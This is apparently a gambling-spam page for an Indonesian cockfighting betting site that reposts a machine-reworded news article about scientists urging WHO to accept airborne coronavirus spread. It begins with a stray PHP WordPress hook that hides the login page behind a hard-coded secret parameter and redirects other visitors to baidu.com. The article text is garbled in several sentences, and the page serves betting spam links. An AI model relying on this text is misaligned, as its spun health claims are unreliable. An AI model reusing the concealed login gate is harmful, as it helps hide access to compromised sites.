//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Menurut temuan Organisasi Kesehatan Dunia, ratusan ilmuwan, dapatkah partikel kecil virus corona di udara menginfeksi manusia? | adu ayam bali_s128.net login_s128.live

Menurut temuan Organisasi Kesehatan Dunia, ratusan ilmuwan, dapatkah partikel kecil virus corona di udara menginfeksi manusia?

TRIBUNNEWS.COM-Ratusan ilmuwan mengklaim terdapat bukti bahwa virus korona baru dalam partikel yang lebih kecil di udara dapat menginfeksi manusia.

Para ilmuwan kemudian meminta Organisasi Kesehatan Dunia (WHO) untuk merevisi laporannya tentang Covid-19 di New York Times pada hari Sabtu.

Seperti yang kita ketahui bersama, Organisasi Kesehatan Dunia mengatakan bahwa penyakit virus korona terutama menyebar dari orang ke orang melalui tetesan kecil di hidung atau mulut, dan ketika Covid-19 batuk, bersin atau berbicara.

Dalam sebuah artikel oleh Reuters, wartawan diharapkan menerbitkan surat terbuka kepada badan tersebut dalam jurnal ilmiah minggu depan. Di 32 negara / wilayah, terdapat bukti bahwa partikel yang lebih kecil dari Covid-19 dapat menginfeksi manusia.

“Kami telah memahami artikel ini dan saat ini sedang meninjau isinya dengan pakar teknis kami,” kata Ka. Juru bicara Organisasi Kesehatan Dunia Anda, Tarik Jasarevic, menanggapi melalui email kepada Reuters untuk meminta komentar.

Menurut New York Times, para ilmuwan sedang mempelajari penyebaran virus corona. Tetesan kecil yang dihembuskan dari jarak jauh dapat meluncur ke seberang ruangan.

Leave a comment

adu ayam bali_s128.net login_s128.live